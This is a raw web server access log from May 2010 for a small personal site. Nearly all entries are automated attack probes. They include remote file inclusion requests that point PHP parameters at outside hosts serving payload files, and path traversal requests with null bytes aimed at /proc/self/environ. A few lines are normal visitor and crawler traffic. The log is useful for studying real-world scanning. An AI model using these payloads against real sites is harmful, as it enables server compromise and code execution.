206.210.68.43 - - [30/May/2010:03:24:46 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.210.68.43 - - [30/May/2010:03:24:53 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.210.68.43 - - [30/May/2010:03:24:53 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.210.68.43 - - [30/May/2010:03:24:53 -0500] "GET /logs/access_log.1273363200%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
74.55.43.66 - - [30/May/2010:03:25:08 -0500] "GET /logs/*.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:03:25:08 -0500] "GET /*.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
95.211.18.156 - - [30/May/2010:03:25:56 -0500] "GET /logs/*.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:03:25:56 -0500] "GET /*.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
207.46.204.233 - - [30/May/2010:03:25:57 -0500] "GET /artwork/music.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [30/May/2010:03:26:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:26:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:26:51 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:26:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:27:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:27:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:27:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
206.210.68.43 - - [30/May/2010:03:28:10 -0500] "GET /logs/access_log.1232668800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
206.210.68.43 - - [30/May/2010:03:28:20 -0500] "GET /logs/access_log.1232668800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.78.118.123 - - [30/May/2010:03:28:37 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:29:08 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:30:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:30:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:31:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.179 - - [30/May/2010:03:31:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.118.123 - - [30/May/2010:03:31:44 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:31:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:31:45 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:32:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:32:34 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:33:19 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:33:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:33:20 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:33:43 -0500] "GET /logs/access_log.1274227200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:33:44 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:33:44 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:33:52 -0500] "GET /logs/access_log.1274227200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:33:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:33:54 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:34:02 -0500] "GET /logs/access_log.1273622400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:34:17 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:34:23 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:34:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:34:25 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:35:18 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:35:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:35:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:36:38 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.175.14.66 - - [30/May/2010:03:38:05 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.14.66 - - [30/May/2010:03:38:05 -0500] "GET /logs/access_log.1271548800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
69.175.14.66 - - [30/May/2010:03:38:05 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
76.12.58.212 - - [30/May/2010:03:40:07 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:03:40:07 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:03:40:08 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:03:40:08 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
114.108.151.149 - - [30/May/2010:03:40:12 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:40:13 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:40:14 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.121.22.5 - - [30/May/2010:03:40:14 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.121.22.5 - - [30/May/2010:03:40:14 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.175.43.117 - - [30/May/2010:03:41:00 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://encyclopedia.thefreedictionary.com/costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MySpace;; InfoPath.1; yie8; AskTB5.6)"
64.175.43.117 - - [30/May/2010:03:41:54 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MySpace;; InfoPath.1; yie8; AskTB5.6)"
64.175.43.117 - - [30/May/2010:03:41:54 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MySpace;; InfoPath.1; yie8; AskTB5.6)"
64.175.43.117 - - [30/May/2010:03:41:55 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MySpace;; InfoPath.1; yie8; AskTB5.6)"
64.175.43.117 - - [30/May/2010:03:41:55 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MySpace;; InfoPath.1; yie8; AskTB5.6)"
114.108.151.149 - - [30/May/2010:03:42:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:42:05 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:42:06 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.55.224.242 - - [30/May/2010:03:42:09 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
190.152.145.54 - - [30/May/2010:03:42:17 -0500] "GET /logs/access_log.1271548800//lostpasswd.php?env[include_prefix]=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
190.152.145.54 - - [30/May/2010:03:42:17 -0500] "GET /logs//lostpasswd.php?env[include_prefix]=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
190.152.145.54 - - [30/May/2010:03:42:17 -0500] "GET //lostpasswd.php?env[include_prefix]=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.152.145.54 - - [30/May/2010:03:42:23 -0500] "GET //lostpasswd.php?env[include_prefix]=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.152.145.54 - - [30/May/2010:03:42:23 -0500] "GET /logs/access_log.1271548800//lostpasswd.php?env[include_prefix]=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
190.152.145.54 - - [30/May/2010:03:42:23 -0500] "GET /logs//lostpasswd.php?env[include_prefix]=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
114.108.151.149 - - [30/May/2010:03:43:14 -0500] "GET /logs/access_log.1273622400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [30/May/2010:03:43:18 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.46.13.97 - - [30/May/2010:03:44:57 -0500] "GET /logs/access_log.1191110400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.78.118.123 - - [30/May/2010:03:45:52 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:45:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:45:54 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.175.14.66 - - [30/May/2010:03:49:54 -0500] "GET /logs/access_log.1273017600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
121.78.118.123 - - [30/May/2010:03:50:59 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:51:47 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:51:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [30/May/2010:03:51:48 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.121.58.89 - - [30/May/2010:03:55:20 -0500] "GET //faster//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:03:55:20 -0500] "GET /logs//faster//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:03:55:20 -0500] "GET /logs/access_log.1270857600//faster//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:03:56:05 -0500] "GET /logs/access_log.1262563200//faster//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.46.13.146 - - [30/May/2010:03:56:27 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.49.28.194 - - [30/May/2010:03:57:01 -0500] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.820"
65.49.28.194 - - [30/May/2010:03:57:01 -0500] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.820"
193.126.206.28 - - [30/May/2010:03:57:17 -0500] "GET /forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:03:57:17 -0500] "GET /logs/access_log.1271721600/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:03:57:17 -0500] "GET /logs/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:03:57:21 -0500] "GET /logs/access_log.1271721600/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:03:57:21 -0500] "GET /logs/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:03:57:21 -0500] "GET /forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:03:57:22 -0500] "GET /forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:03:57:22 -0500] "GET /logs/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:03:57:22 -0500] "GET /logs/access_log.1271721600/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:03:57:23 -0500] "GET /forums/chat/inc/cmses//admin.inc.php?dir[inc]=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:03:57:23 -0500] "GET /logs/forums/chat/inc/cmses//admin.inc.php?dir[inc]=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:03:57:24 -0500] "GET /logs/access_log.1271721600/forums/chat/inc/cmses//admin.inc.php?dir[inc]=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.46.13.40 - - [30/May/2010:03:57:27 -0500] "GET /logs/access_log.1238976000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.58.89 - - [30/May/2010:03:57:51 -0500] "GET /logs/access_log.1270771200/forums/chat/inc/cmses//admin.inc.php?dir[inc]=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:03:58:30 -0500] "GET /logs/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:03:58:30 -0500] "GET /forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:03:58:30 -0500] "GET /logs/access_log.1271721600/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.46.199.40 - - [30/May/2010:03:58:57 -0500] "GET /logs/access_log.1219449600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.126.206.28 - - [30/May/2010:03:59:19 -0500] "GET /logs/access_log.1270771200/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:03:59:23 -0500] "GET /logs/access_log.1270771200/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:03:59:28 -0500] "GET /logs/access_log.1270771200/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://flatmates.ru/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
219.117.209.213 - - [30/May/2010:03:59:59 -0500] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.805"
219.117.209.213 - - [30/May/2010:03:59:59 -0500] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.805"
62.44.82.61 - - [30/May/2010:04:00:28 -0500] "GET /logs/access_log.1270771200/forums/chat/inc/cmses//aedating4CMS.php?dir[inc]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:00:41 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:00:42 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:00:42 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
109.71.41.45 - - [30/May/2010:04:01:09 -0500] "GET /logs/?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:01:09 -0500] "GET /?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
121.78.118.123 - - [30/May/2010:04:01:18 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.59.6.16 - - [30/May/2010:04:01:19 -0500] "GET /index.php?option=com_fabrik&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:04:01:19 -0500] "GET /logs/index.php?option=com_fabrik&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:04:01:19 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
109.71.41.45 - - [30/May/2010:04:03:02 -0500] "GET /logs/?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:04:03:02 -0500] "GET /?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
80.65.166.74 - - [30/May/2010:04:03:12 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:03:12 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:03:12 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
109.71.41.45 - - [30/May/2010:04:03:16 -0500] "GET /logs/?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7543 "-""libwww-perl/5.823"
